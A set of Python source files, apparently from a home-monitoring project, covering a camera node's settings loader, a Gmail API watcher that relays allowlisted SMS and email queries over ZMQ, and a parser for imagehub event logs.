# if frame_count = -1, then already sending images continuously...
# so no need to send the images of this detected event
# if frame_count > 0, need to send send_count images from the cam_q
# by appending them to send_q
if self.frame_count > 0: # then need to send images of this event
send_count = min(len(camera.cam_q), self.send_count)
if (self.current_state == 'still') and (self.print_still_frames is False):
send_count = 0
for i in range(-send_count, -1):
text_and_image = (camera.text, camera.cam_q[i])
send_q.append(text_and_image)
# Now that current state has been sent, it becomes the last_state
self.last_state = self.current_state
def send_test_data(self, images, state_values, send_q):
""" Sends various test data, images, computed state values via send_q
Used for testing, this function takes a set of images and computed
values such as the number of contours, the average light intensity,
and the computed state (such as "moving" or "still"), and puts these values
into small images that can be displayed in a simple test hub for
tuning the settings parameters of a detector.
Parameters:
images (list): test images to send for display, e.g., ROI, grayscale
state_values (list): the name and value of tuning parameters, such
as state, area, N_contours, Mean Pixel Value, etc.
"""
for text_and_image in images:
send_q.append(text_and_image)
font = cv2.FONT_HERSHEY_SIMPLEX
for text_and_value in state_values:
text, value = text_and_value
state_image = np.zeros((50, 200), dtype="uint8") # blank image
cv2.putText(state_image, value, (10, 35), font,
1, (255, 255, 255), 2, cv2.LINE_AA)
text_and_image = (text, state_image)
send_q.append(text_and_image)
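# For illustration (hypothetical values): with images = [('ROI', roi)] and
# state_values = [('State', 'moving'), ('Area', '42')], this method appends
# ('ROI', roi), then ('State', <50x200 image of 'moving'>) and
# ('Area', <50x200 image of '42'>) to send_q, in that order.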
class Settings:
"""Load settings from YAML file
Note that there is currently almost NO error checking for the YAML
settings file. Therefore, by design, an exception will be raised
when a required setting is missing or misspelled in the YAML file.
This stops the program with a Traceback; reading the Traceback will
indicate which setting (and which line below) caused the error.
Fix the YAML file and rerun the
program until the YAML settings file is read correctly.
There is a "print_settings" option that can be set to TRUE to print
the dictionary that results from reading the YAML file. Note that the
order of the items in the dictionary will not necessarily be the order
of the items in the YAML file (this is a property of Python dictionaries).
"""
def __init__(self):
userdir = os.path.expanduser("~")
with open(os.path.join(userdir, "imagenode.yaml")) as f:
self.config = yaml.safe_load(f)
self.print_node = False
if 'node' in self.config:
if 'print_settings' in self.config['node']:
if self.config['node']['print_settings']:
self.print_settings()
self.print_node = True
else:
self.print_node = False
else:
self.print_settings('"node" is a required settings section but not present.')
raise KeyboardInterrupt
if 'hub_address' in self.config:
self.hub_address = self.config['hub_address']['H1']
# TODO add read and store H2 and H3 hub addresses
else:
self.print_settings('"hub_address" is a required settings section but not present.')
raise KeyboardInterrupt
if 'name' in self.config['node']:
self.nodename = self.config['node']['name']
else:
self.print_settings('"name" is a required setting in the "node" section but not present.')
raise KeyboardInterrupt
if 'patience' in self.config['node']:
self.patience = self.config['node']['patience']
else:
self.patience = 10 # default is to wait 10 seconds for hub reply
if 'queuemax' in self.config['node']:
self.queuemax = self.config['node']['queuemax']
else:
self.queuemax = 50
if 'heartbeat' in self.config['node']:
self.heartbeat = self.config['node']['heartbeat']
else:
self.heartbeat = None
if 'stall_watcher' in self.config['node']:
self.stall_watcher = self.config['node']['stall_watcher']
else:
self.stall_watcher = False
if 'REP_watcher' in self.config['node']:
self.REP_watcher = self.config['node']['REP_watcher']
else:
self.REP_watcher = True
if 'send_threading' in self.config['node']:
self.send_threading = self.config['node']['send_threading']
else:
self.send_threading = False
if 'send_type' in self.config['node']:
self.send_type = self.config['node']['send_type']
else:
self.send_type = 'jpg' # default send type is jpg
if 'cameras' in self.config:
self.cameras = self.config['cameras']
else:
self.cameras = None
if 'sensors' in self.config:
self.sensors = self.config['sensors']
else:
self.sensors = None
if 'lights' in self.config:
self.lights = self.config['lights']
else:
self.lights = None
def print_settings(self, title=None):
""" prints the settings in the yaml file using pprint()
"""
if title:
print(title)
print('Contents of imagenode.yaml:')
pprint.pprint(self.config)
print()
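# A minimal imagenode.yaml sketch that satisfies the required settings read
# in __init__ above; the values shown (including the hub address) are
# illustrative assumptions, not recommended defaults:
#
#   node:
#     name: JeffOffice
#     print_settings: False
#     patience: 10
#     queuemax: 50
#     send_type: jpg
#   hub_address:
#     H1: tcp://192.168.1.155:5555
#   # 'cameras', 'sensors' and 'lights' sections are optional; each defaults
#   # to None above when absent.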
```
|
{
"source": "jeffbass/yin-yang-ranch",
"score": 3
}
|
#### File: helpers/comms/gmail.py
```python
import os
import csv
import sys
import base64
import pprint
import pickle # used for storing / reading back credentials
import logging
from time import sleep
from pathlib import Path
from datetime import datetime
from collections import namedtuple
from helpers.utils import Patience
from multiprocessing import Process
from email.mime.text import MIMEText
from imagezmq import ImageHub, ImageSender
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
log = logging.getLogger(__name__)
class QuerySender(ImageSender):
def __init__(self, connect_to='tcp://*:5555', REQ_REP = True):
ImageSender.__init__(self, connect_to=connect_to, REQ_REP = REQ_REP)
def send_query(self, query, buf=b'0'):
reply_b = self.send_jpg(query, buf) # send_jpg returns a bytestring
return reply_b # just 'OK' for gmail comm channel; don't need to use it
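# Minimal usage sketch of QuerySender (the address and query text are
# hypothetical; the Gmail class below connects the same way on its
# default port 5559):
#
#   q_s = QuerySender(connect_to='tcp://127.0.0.1:5559')
#   reply = q_s.send_query('some query text')  # returns a bytestring, e.g. b'OK'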
class Gmail:
""" Initialize gmail API, read and write messages
Sets up the Gmail service. Starts a Process() to watch Gmail for new
messages and send the ones that are queries to Librarian via ZMQ. Provides
a method to send replies back to Gmail service.
Parameters:
settings (Settings object): settings & options from librarian.yaml.
details (dict): channel options & details specified for Gmail channel
"""
def __init__(self, settings, details, use_q_s=True):
# pprint.pprint(details)
gmail_dir = settings.lib_dir / Path('gmail') # gmail directory
token = Path("token1.pickle") # token1 when use_q_s=False
self.token_file = str(gmail_dir / token)
creds = Path("credentials.json")
self.credentials_file = str(gmail_dir / creds)
# Use QuerySender if this instance of Gmail is sending messages via ZMQ
# Also use alternate directory and files for Gmail creds files
if use_q_s: # set up QuerySender to send messages via ZMQ
self.port = details.get('port', 5559) # gmail ZMQ port
self.address = 'tcp://127.0.0.1:' + str(self.port).strip()
# print('Self address:', self.address)
self.q_s = QuerySender(connect_to=self.address)
gmail_dir = settings.lib_dir / Path('gmail2') # gmail directory
token = Path("token2.pickle") # token2 when use_q_s=True
self.token_file = str(gmail_dir / token)
creds = Path("credentials.json")
self.credentials_file = str(gmail_dir / creds)
contacts = self.get_contacts(gmail_dir, details)
self.phones_OK_list = [contact.mobile_phone for contact in contacts]
self.emails_OK_list = [contact.email for contact in contacts]
self.mail_check_seconds = details.get('mail_check_seconds', 5)
self.patience = settings.patience
self.gmail, self.historyId = self.gmail_start_service()
def gmail_start_service(self):
""" gmail_start_service -- start the gmail service using credentials
Starts the gmail service using the 2 credential files (json and token).
See Gmail API docs and quickstart.py for details. Reads a message to
obtain a current historyId; used by gmail_monitor to watch
for changes in the gmail mailbox; polling mailbox history is much
cheaper in "points" than polling for new messages themselves.
Returns:
gmail: the Gmail service object with read, send, etc. methods.
historyId: a current historyId
"""
creds = self.get_credentials()
# initialize gmail service
gmail = build('gmail', 'v1', credentials=creds, cache_discovery=False)
# get list of messages: first step in getting a historyId
results = gmail.users().messages().list(userId='me',
maxResults=10,includeSpamTrash=False).execute()
num_msgs = results.get('resultSizeEstimate', -1)
messages = results.get('messages', [])
if not messages:
latestMessageId = None
else:
# get the first message in the list which should be the latest
latestMessageId = messages[0].get('id', None)
latestMessageThreadId = messages[0].get('threadId', None)
# print('Latest Message Id and Thread Id:')
# print(latestMessageId, latestMessageThreadId)
# print('Number of messages Estimate: ', num_msgs)
# print('Number of messages in message list: ', len(messages))
if not messages:
pass
# print('No messages retrieved')
else:
pass
# print()
# print('Received', len(messages), ' messages.')
# print('list of messages:')
# for message in messages:
# pprint.pprint(message)
# print()
# messages().list() returns a list of message & thread ids
# Id and threadId; if they are the same value
# then message is the first message in a new thread
# get a single message & get its historyId
# results is a dict of all the fields of a single message; see API docs
results = gmail.users().messages().get(userId='me',
id=latestMessageId, format='minimal').execute()
if not results:
# print('No message retrieved')
pass
else:
historyId = results.get('historyId', None)
# print('Retrieval of message: ', latestMessageId, 'of thread: ',
# latestMessageThreadId)
# pprint.pprint(results)
return gmail, historyId
def get_credentials(self):
"""Gets valid user credentials from token.pickle storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
The OAuth2 flow uses the Chrome browser; USE SDB browser login!!!
(Because we are reading SDB email)
Returns:
creds, the obtained credentials.
"""
# If modifying these scopes, delete the file token.pickle.
# Then, next get_credentials() will build new token with new SCOPES.
SCOPES = ['https://www.googleapis.com/auth/gmail.modify']
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
token_file = self.token_file
credentials_file = self.credentials_file
# print('Creds file names:')
# print(' token:', token_file, ' type:', type(token_file))
# print(' creds:', credentials_file, ' type:', type(credentials_file))
if os.path.exists(token_file):
with open(token_file, 'rb') as token:
creds = pickle.load(token)
# print('Pickled token loaded.')
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
# print('Doing creds refresh:')
if creds and creds.expired and creds.refresh_token:
# print('Doing Refresh Credentials Request:')
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
credentials_file, SCOPES)
# print("Used existing credentials_file OK.")
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(token_file, 'wb') as token:
# print('Saving token.pickle file.')
pickle.dump(creds, token)
return creds
def gmail_watcher(self, gmail, historyId, mail_check_seconds,
phones_OK_list, emails_OK_list):
# By putting historyId into a list, it becomes mutable and holds updates
history_list = [historyId] # historyId will be updated by below
next_page_token = ['emptyToken'] # token for getting 2nd page of results
while True: # forever loop watching gmail mailbox for changes
if self.mailbox_changed(gmail, history_list, next_page_token,
mail_check_seconds):
# get new messages from gmail, but only the ones that are from
# senders on our OK lists; others are skipped.
new_messages = self.get_new_messages(gmail,
phones_OK_list,
emails_OK_list)
# print('New messages:')
# pprint.pprint(new_messages)
if new_messages: # there are some new messages
self.mark_as_read(gmail, new_messages) # move to below send_query!
for message in new_messages:
# each message is a tuple of values from get_new_messages()
# create a query from the tuple that is string of pure text
query = "|".join(list(message))
# need to add Patience() code here to recover from
# network or librarian outages, similar to how
# imagenodes do.
REP = self.q_s.send_query(query) # ZMQ REP b'OK'
def mailbox_changed(self,gmail, history_list, next_page_token, mail_check_seconds):
''' Use history().list() to check for changes to mailbox
Depending on how often the gmail api is "checked",
the multiple calls per minute needed to watch
for new emails can be very expensive. Using history().list() is cheaper.
Google has Usage Limits measured in Quota Units.
messages().list() is 5 Quota Units and
history().list() is 2 Quota Units (less than half price)
drafts().send() is 100 Quota Units
This function implements a forever polling loop checking
history().list() for changes. Returns True when history
has changed, meaning something in the mailbox has changed.
There may be false positives (unimportant mailbox changes),
but other functions check for valid / important messages.
This function only watches for history().list() changes
Parameters:
gmail (service object): the Gmail service object
history_list (list): list of historyId's. Update to newest one each loop.
next_page_token (list): list whose 1st element is the nextPageToken
mail_check_seconds (int): how often to check the gmail history list
Returns:
Boolean True if mailbox change; False if not
'''
startHistoryId = history_list[0]
# users().history().list() requires a valid startHistoryId.
# The startHistoryId was obtained by gmail_start_service().
# print("startHistoryId: ", startHistoryId, "is type: ", type(startHistoryId))
last_results = gmail.users().history().list(userId='me',
startHistoryId=startHistoryId,
maxResults=10).execute()
i = 0 # number of history changes checks
num_err_results = 0
while True: # loop forever until there is a change in mailbox history
# Do not check history more often than mail_check_seconds
sleep(mail_check_seconds)
try:
results = gmail.users().history().list(userId='me',
startHistoryId=startHistoryId,
maxResults=10).execute()
except Exception as ex:
num_err_results += 1
log.error("Error raised in gmail.history.list() num = " + str(num_err_results))
results = last_results # set to last non-error results
if num_err_results > 10: # too many; put into a variable?
raise # raise the exception up to main handler
else: # wait for timeout type error to clear
sleep(10) # need to edit this into a variable?
i += 1
if results == last_results: # no mailbox history changes
# print('Retrieved results #', i, ": No changes")
pass
else: # some changes in history().list()
# print('Retrieved results #', i, ": Some changes")
# last_results = results
nextPageToken = results.get("nextPageToken", "emptyToken")
historyId = results.get("historyId", "emptyId")
# print("nextPageToken: ", nextPageToken)
# print("historyId: ", historyId)
# set historyId and nextPageToken as new list elements
history_list[0] = historyId # save historId in list for next call
next_page_token[0] = nextPageToken
return True
# print("No history changes pass ", i)
def is_SMS(self, from_value):
# check that this message has address form of a text message
if ('<EMAIL>>' in from_value
and '(SMS)' in from_value
and '<1' in from_value):
return True
else:
return False
def get_new_messages(self, gmail, phones_OK_list,
emails_OK_list, n=25):
''' gets some new messages from gmail messages.list()
Parameters:
phones_OK_list (list): list of phone numbers OK to receive from
emails_OK_list (list): list of emails it is OK to receive from
n (int): number of emails to retrieve in a batch
'''
# print("Fetching message list")
results = gmail.users().messages().list(userId='me',
labelIds=['UNREAD', 'INBOX'],
maxResults=n).execute()
message_list = []
if 'messages' in results:
message_list.extend(results['messages'])
else:
return None
# print("Number of messages in results: ", len(message_list))
if len(message_list) == 0:
return None
new_messages = []
for message in message_list:
msg_id = message.get('id', None)
message = gmail.users().messages().get(userId='me',
id=msg_id).execute()
thread_id = message.get('threadId', None)
labels = message.get('labelIds', None)
message_internalDate = message['internalDate']
message_datetime = datetime.fromtimestamp(int(int(message_internalDate)/1000))
payload = message['payload']
headers = payload['headers']
# each header is a dictionary holding 2 tuples
# each tuple is (header name, header value)
# name and value are unicode strings
for header in headers:
name, value = header.items()
name_str = str(name[1])
from_str = u'From'
subject_str = u'Subject'
to_str = u'To'
if (name_str == from_str):
from_value = value[1]
elif (name_str == subject_str):
subject_value = value[1]
elif (name_str == to_str):
to_value = value[1]
# print("Debugging SMS:")
# print("From:", from_value)
# print("is_SMS value:", is_SMS(from_value))
if self.is_SMS(from_value):
# extract SMS sending phone number from "From" header
num_start = from_value.find('<1') + 14
num_end = num_start + 10
sms_from = from_value[num_start:num_end]
# print("sms_from: |" + sms_from + "|")
if sms_from not in phones_OK_list:
continue
message_text = message['snippet'][13:]
text_end = message_text.find(" YOUR ")
message_text = message_text[:text_end]
else: # a regular email; not SMS
sms_from = None
# print('Email from: ', from_value, type(from_value))
if from_value not in emails_OK_list:
continue
message_text = message['snippet']
# print("message_text:", message_text)
# line=line.decode('utf-8','ignore').encode("utf-8")
# bytes(line, 'utf-8').decode('utf-8','ignore')
# used encode to get rid of all non-ascii characters
message_text = bytes(message_text, 'utf-8').decode('utf-8','ignore')
# print('message_text:', message_text, 'type:', type(message_text))
# replace snippet encoding of apostrophe
# TODO Find out why can't find / replace '
message_text = message_text.replace("&#39;", "'")
# append message tuple to new_messages, message_text first
new_messages.append((message_text, msg_id, thread_id,
from_value, subject_value,
to_value, sms_from),)
return new_messages
def mark_as_read(self, gmail, new_messages):
""" Mark gmail messages as read by removing UNREAD label
Parameters:
gmail (service object): gmail service object
new_message (list): list of messages to be marked as "READ"
"""
if new_messages is None: # no messages to mark
return
for message in new_messages:
msg_id = message[1]
gmail.users().messages().modify(userId='me',
id=msg_id,body={'removeLabelIds': ['UNREAD']}).execute()
def gmail_send_reply(self, gmail, reply_str):
""" gmail_send_reply: send reply from the Librarian back via gmail
This function is called from the librarian main loop.
It sends a single query reply back via gmail. Each query sent to the
librarian from gmail has header info appended to the text of the
message. This gmail reply sender uses that header info to reply to the
correct messageId, threadId, etc.
Structure of reply_str:
reply_text|msg_id|thread_id|to_value|subject_value|from_value|sms_from
(note that to_value and from_value are swapped from original message)
(reply protocol requires this swapping pattern to draft a reply)
Parameters:
gmail (Gmail service object): Gmail service object for Gmail API
reply_str (str): reply from Librarian to be sent back via gmail
"""
# First parse the reply into message text and gmail threadid, etc.
reply = reply_str.split('|') # reply is list of reply parts in reply_str
# then load the draft reply and send it
threadid = reply[2] # thread being replied to
to_send = MIMEText(reply[0]) # text of reply created by librarian
# to_send = reply[0] # text of reply created by librarian
to_send["To"] = reply[3] # replying to (whick was from_value in msg)
to_send["Subject"] = reply[4] # replying to subject
to_send["From"] = reply[5] # replying from (which was to_value in msg)
# example: bytesThing = stringThing.encode(encoding='UTF-8')
raw = base64.urlsafe_b64encode(to_send.as_string().encode(encoding='UTF-8'))
raw = raw.decode(encoding='UTF-8') # convert back to string
message = {'message': {'raw': raw, 'threadId': threadid}}
draft = gmail.users().drafts().create(userId="me", body=message).execute()
draftid = draft['id']
gmail.users().drafts().send(userId='me',
body={ 'id': draftid }).execute()
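# A hypothetical reply_str illustrating the 7-field protocol described above
# (every value below is invented for illustration only):
#
#   "Barn temp is 77 F|1712f3ab|1712f3ab|<to addr>|SMS reply|<from addr>|8885551212"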
def gmail_send_SMS(self, phone_number, message_text):
""" gmail_send_SMS: send SMS text message via Gmail
It sends a single SMS text message. For security and other reasons, this
does not send a Gmail meessage. Instead it searches for a GMail
SMS message from the phone number. Then composes a reply_str. Then
Structure needed for reply_str:
reply_text|msg_id|thread_id|to_value|subject_value|from_value|sms_from
(note that to_value and from_value are swapped from original message)
(reply protocol requires this swapping pattern to draft a reply)
Parameters:
phone_number (str): phone number to send text message to
message_text (str): message to send to phone_number
"""
# use phone number to search for Gmail SMS messages from that number
gmail = self.gmail
p = phone_number.strip()
area_code = p[0:3]
first_3 = p[3:6]
last_4 = p[6:10]
search = ' '.join(['SMS', area_code, first_3, last_4])
# print('Search String Parts:')
# print(' area_code:', area_code)
# print(' first_3:', first_3)
# print(' last_4:', last_4)
# print('Search string for Gmail:', search)
results = gmail.users().messages().list(userId='me',
maxResults=10,includeSpamTrash=False,q=search).execute()
num_msgs = results.get('resultSizeEstimate', -1)
messages = results.get('messages', [])
num_messages = len(messages)
# print('Number of messages from Gmail SMS number query', num_messages)
if not messages:
latestMessageId = None
else:
# get the first message in the list which should be the latest
latestMessageId = messages[0].get('id', None)
latestMessageThreadId = messages[0].get('threadId', None)
msg_id = messages[0].get('id', None)
message = gmail.users().messages().get(userId='me',
id=msg_id).execute()
thread_id = message.get('threadId', None)
labels = message.get('labelIds', None)
message_internalDate = message['internalDate']
message_datetime = datetime.fromtimestamp(int(int(message_internalDate)/1000))
payload = message['payload']
headers = payload['headers']
# each header is a dictionary holding 2 tuples
# each tuple is (header name, header value)
# name and value are unicode strings
for header in headers:
name, value = header.items()
name_str = str(name[1])
from_str = u'From'
subject_str = u'Subject'
to_str = u'To'
if (name_str == from_str):
from_value = value[1]
elif (name_str == subject_str):
subject_value = value[1]
elif (name_str == to_str):
to_value = value[1]
# print("Debugging SMS:")
# print("From:", from_value)
# print("is_SMS value:", is_SMS(from_value))
# print("message_text:", message_text)
# line=line.decode('utf-8','ignore').encode("utf-8")
# bytes(line, 'utf-8').decode('utf-8','ignore')
# used encode to get rid of all non-ascii characters
# message_text = bytes(message_text, 'utf-8').decode('utf-8','ignore')
# print('message_text:', message_text, 'type:', type(message_text))
# replace snippet encoding of apostrophe
# TODO Find out why can't find / replace '
# message_text = message_text.replace("'", "'")
# append message tuple to new_messages, message_text first
if 'SMS' in to_value:
to_value, from_value = from_value, to_value
time_str = datetime.now().strftime("%I:%M %p").lstrip("0")
message_text = message_text + " (" + time_str + ")"
message_tuple = (message_text, msg_id, thread_id,
from_value, subject_value,
to_value, search)
msg_string = "|".join(list(message_tuple))
# print("The message string with msg_id, thread_id, etc:")
# print(msg_string)
self.gmail_send_reply(gmail, msg_string)
def close(self):
""" close: close the QuerySender ZMQ port and context
"""
self.q_s.close()
def get_contacts(self, gmail_dir, details):
"""Gets contacts from contacts data file
Example lines from contacts.txt for reference
name|full_name|canonical_name|mobile_phone|email
Jeff|<NAME>|jeff_bass|8885551212|<EMAIL>
Returns:
contacts, a list of named tuples of contact info
Example:
>>> [contact.mobile_phone for contact in contacts if contact.name=='Jeff']
['8885551212']
"""
contacts_file = details.get('contacts', 'contacts.txt')
contacts_file = gmail_dir / Path(contacts_file)
# print('contacts file:', contacts_file )
with open(contacts_file, 'r') as f:
# read header line and set up namedtuple
lines = csv.reader(f, delimiter='|')
# fields = lines.next() # field names list from first line in file
fields = next(lines) # field names list from first line in file
Contact = namedtuple('Contact', fields)
# read all lines in file, creating a named tuple for each line in file
# if len(line) > 0 avoids TypeError due to any blank lines at end of file
contacts = [Contact(*line) for line in lines if len(line) > 0]
return contacts
def fix_comm_link(self):
""" Evaluate, repair and restart communications link with librarian.
Restart link if possible, else restart program.
"""
# TODO add some of the ongoing experiments to this code when it has
# progressed in development and testing
# Current protocol:
# just sys.exit() for now.
# Because this program is started
# and restarted by systemd as a service with restart option on, it
# will restart the program with a delay and try communicating again.
# It will be logged in systemctl journald.
#
# Other ideas that might be worth trying:
# 1. Just wait longer one time and try sending again
# 2. Doing 1 repeatedly with exponential time increases
# 3. Stopping and closing ZMQ context; restarting and sending
# last message
# 4. Check WiFi ping; stop and restart WiFi service
#
raise KeyboardInterrupt
```
#### File: librarian-prototype/librarian/gmail_watcher.py
```python
import sys
import signal
import traceback
import logging
import logging.handlers
from helpers.library import Settings
from helpers.comms.gmail import Gmail
from helpers.utils import clean_shutdown_when_killed
def main():
# set up controlled shutdown when Kill Process or SIGTERM received
signal.signal(signal.SIGTERM, clean_shutdown_when_killed)
log = start_logging()
gmail = None # will allow 'finally:' to work correctly if no gmail exists
try:
log.warning('Starting gmail_watcher.py')
gmail = None # will allow finally: to work correctly if no gmail exists
settings = Settings() # get settings for communications channels
details = settings.comm_channels.get('gmail', {})
gmail = Gmail(settings, details)
gmail.gmail_watcher(gmail.gmail, gmail.historyId,
gmail.mail_check_seconds, gmail.phones_OK_list,
gmail.emails_OK_list)
except (KeyboardInterrupt, SystemExit):
log.warning('Ctrl-C was pressed or SIGTERM was received.')
except Exception as ex: # traceback will appear in log
log.exception('Unanticipated error with no Exception handler.')
finally:
if gmail:
gmail.q_s.close()
log.info('Exiting gmail_watcher.py')
sys.exit()
def start_logging():
log = logging.getLogger()
handler = logging.handlers.RotatingFileHandler('gmail_watcher.log',
maxBytes=95000, backupCount=15)
formatter = logging.Formatter('%(asctime)s ~ %(message)s')
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(logging.WARNING)
return log
if __name__ == '__main__' :
main()
```
#### File: librarian/helpers/data_tools.py
```python
import sys
import pprint
import logging
import threading
import subprocess
from time import sleep
from pathlib import Path
from datetime import datetime
from collections import deque
from helpers.utils import YamlOptionsError
class HubData:
""" Methods and attributes to transfer data from imagehub data files
Provides methods for Librarian to access imagehub data, including event
logs and images stored by the imagehub.
Parameters:
settings (Settings object): settings object created from YAML file
"""
def __init__(self, settings):
# log directory and log file refer to the event log of the imagehub
ld = Path(settings.log_directory)
if not ld.exists():
raise YamlOptionsError('Log directory in YAML file does not exist.')
elif not ld.is_dir():
raise YamlOptionsError('Log directory in YAML file is not a directory.')
self.log_dir = ld
self.max_days = 3 # Number of days of hub log files to be loaded
self.max_history = 300 # Maximum size of the event_deque history
self.event_data = {} # see description in load_log_data function
self.newest_log_line = '' # keep track of last text line read from log
self.line_count = 0 # total lines read into event_data since program startup; useful for librarian status
self.event_data_lock = threading.RLock()
self.load_log_data(self.log_dir, self.max_days) # initial load of self.event_data
# pprint.pprint(self.event_data)
# start thread receive & add data to self.event_data as new lines are
# added to the imagehub log.
self.log_check_interval = 2 # seconds: how often check for added log lines
t = threading.Thread(target=self.watch_for_new_log_lines)
# print('Starting watch_for_new_log_lines thread.')
t.daemon = True # allows this thread to be auto-killed on program exit
t.name = 'watch_for_new_log_lines' # naming the thread helps with debugging
t.start()
""" # this is the block of lines used to test self.add_new_log_lines()
print('Total number of lines read from all log files:', self.line_count)
print('BEFORE call to add_new_log_lines: Newest log line:', self.newest_log_line)
# testing the add lines modules
query = input('Add some lines to imagehub.log, then press enter. ')
self.add_new_log_lines()
print('AFTER call to add_new_log_lines: Newest log line:', self.newest_log_line)
pprint.pprint(self.event_data)
print('Total number of lines read from all log files:', self.line_count)
print('End of test')
sys.exit() """
def load_log_data(self, ld, max_days):
""" read the imagehub log file(s), loading the event_deque
This method reads event lines from the log files. It always reads the
current log file. It also reads up to "max_days" additional log files.
Event log files are created by the imagehub.py program. They are created
using the Python logging module and rotate daily at midnight.
Event log files are "rotated" using Python's TimedRotatingFileHandler:
This means the imagehub log files have names like:
lf.log, lf.log.2020-10-22, lf.log.2020-10-21, lf.log.2020-10-20, ...
where:
lf.log is the "current log" that is currently updated by imagehub.
lf.log.<<date>> is the name pattern for the logs rotated each day.
The log files are loaded in time order. The oldest log file (up to
'max_days' old) is loaded. Then the next oldest log file is loaded,
then the next oldest log file until the current_log file, which is
always loaded last. The lines from each log file are loaded into the
event_data deque by the self.load_log_event_lines method.
Parameters:
ld (PosixPath): imagehub log directory containing event log files
max_days (int): number of additional log file day(s) to load
"""
all_logs = list(ld.glob('*log*')) # all files that have *log* in them
current_log = list(ld.glob('*log')) # current log ends in 'log'
if not current_log:
raise YamlOptionsError('There is no file ending in "log".')
elif len(current_log) > 1:
raise YamlOptionsError('More than one file ending in "log".')
else:
current_log = current_log[0] # now current log is PosixPath file
self.log_file = str(current_log) # string version of log file name
all_logs.remove(current_log) # keep only the 'dated' logs
logs_to_load = list()
if all_logs: # we have at least one 'dated' log...
# ...so get the most recent 'max_days' of them
all_logs.sort(reverse=True)
logs_to_load = all_logs[:self.max_days] # most recent ones
logs_to_load.sort() # sort them in time order: oldest to newest
logs_to_load.append(current_log) # append the current log last
for log in logs_to_load:
with open(log, 'r') as f:
lines = f.readlines()
self.load_log_event_lines(lines)
def load_log_event_lines(self, lines):
""" loads lines from a log file into the event_data dict()
Loads event lines from the log files. Loads one line at
a time, adding the event data to the self.event_data dict() which is a
nested dictionary. Example data values from self.event_data:
event_data[node][event] is a deque of (datetime, value) tuples, e.g.:
event_data['barn']['motion'][0] == (datetime, 'moving') # current
event_data['barn']['motion'][1] == (datetime, 'moving') # previous
event_data['barn']['motion'][2] == (datetime, 'moving') # earlier
Each data tuple is (datetime, event_value) where each
event_value is a measure like "77 degrees" or a state like "motion".
This deque is of fixed length, so as new data points are left_appended,
those data points beyond max_history are discarded from the event_data
dictionary (but not from the event log files; those are "read only"
from the perspective of the librarian; they are written ONLY by the
imagehub program).
Parameters:
lines (list): lines from an imagehub event log file
"""
for line in lines:
self.line_count += 1
# node_tuple is (node, event, when, value)
node_tuple = self.parse_log_line(line) # returns "None" if invalid
if node_tuple: # only load a valid node_tuple that is not "None"
self.load_log_event(node_tuple)
self.newest_log_line = lines[-1]
def load_log_event(self, node_tuple):
""" load a single node event into the self.event_data dict()
Creates a single entry in the self.event_data dict() which holds all
the recent events logged from imagenodes.
'node_tuple' objects are parsed from imagehub log lines by the method
self.parse_log_line(). This method creates entries in self.event_data.
event_data[node][event] is a deque of (datetime, value) tuples, e.g.:
event_data['barn']['motion'][0] == (datetime, 'moving') # current
event_data['barn']['motion'][1] == (datetime, 'moving') # previous
event_data['barn']['motion'][2] == (datetime, 'moving') # earlier
Each data tuple is (datetime, event_value) where each
event_value is a measure like "77 degrees" or a state like "motion".
This deque is of fixed length, so as new data points are left_appended,
those data points beyond max_history are discarded from the event_data
dictionary (but not from the event log files; those are "read only"
from the perspective of the librarian; they are written ONLY by the
imagehub program).
All string values in the tuple are stripped of whitespace and converted
to lower case: 'node', 'event', 'value'.
'when' is a datetime value and is stored as is.
Parameters:
node_tuple (tuple): parsed values from a single event log line
"""
# node_tuple is (node, event, when, value)
node = node_tuple[0].strip().lower()
event = node_tuple[1].strip().lower()
when = node_tuple[2]
value = node_tuple[3].strip().lower()
with self.event_data_lock:
if node not in self.event_data:
self.event_data[node] = {}
if event not in self.event_data[node]:
self.event_data[node][event] = deque(maxlen=self.max_history)
self.event_data[node][event].appendleft((when, value))
def parse_log_line(self, line):
""" parse a single line from a log file returning a tuple of values
Parses a single event line of text from a log file and returns a tuple
(node_name, event_type, <<datetime>>, event_value)
An event_value is a measure like "77 degrees" or a state like "motion".
This deque is of fixed length, so as new data points are left_appended,
those data points beyond 'max_history' are discarded from the event_data
dictionary (but not from the event log files; those are "read only"
from the perspective of the librarian; they are written ONLY by the
imagehub program).
Example:
Input Log data lines like these:
2020-06-09 18:27:11,776 ~ Driveway Mailbox|motion|moving
2020-06-09 18:33:15,788 ~ Barn|Temp|83 F
Return tuples like these:
(Driveway Mailbox, motion, <<datetime>>, moving)
(Barn, Temp, <<datetime>>, 83)
Parameters:
line (str): a single log line read from a log file
Returns:
tuple (node, event, when, value)
OR
None # if there is not a valid datetime in beginning of line
"""
two_parts = line.split('~')
part1 = two_parts[0].strip()
try:
when = datetime.strptime(part1, "%Y-%m-%d %H:%M:%S,%f")
except ValueError:
return None # Every valid line has a valid datetime
part2 = two_parts[1].rstrip(' F\n').strip().split('|')
if len(part2) < 3: # this is not a node message; system or other msg
node = 'non-node'
event = 'other'
value = part2[0] # there will be at least one string
else:
node = part2[0] # e.g. barn
event = part2[1] # e.g. motion
value = part2[2] # e.g. still
return node, event, when, value
def watch_for_new_log_lines(self):
""" watch_for_new_log_lines: thread to fetch newly added log lines
"""
while True:
self.add_new_log_lines()
sleep(self.log_check_interval)
def add_new_log_lines(self):
""" add new event log data lines to self.event_data dict()
Runs in a thread that is started when HubData is instantiated.
Checks imagehub event log file(s) for any changes by using the linux
"tail" utility (chosen because it is very fast and does NOT read the
entire file as a Python program would need to). Adds any newly added
event log lines to the self.event_data dict().
Algorithm:
1. tail -n_lines from current log file
2. is newest_log_line the last line in the tail? return; no new lines
3. if the tail of n_lines includes the newest_log_line, then
load_log_event_lines from that line through to the last line in log
4. else do a tail with more lines up until either find newest_log_line
or the entire last 2 log files have been returned
"""
# get n_lines from tail of log file and check if contains last_line_read
line_num = 0
try_n_lines = [10, 20, 40, 80, 160, 320, 640, 1024, 2048, 4096]
for n_lines in try_n_lines:
# OS command equivalent: tail -n_lines < self.log_file
lines = self.log_tail(n_lines)
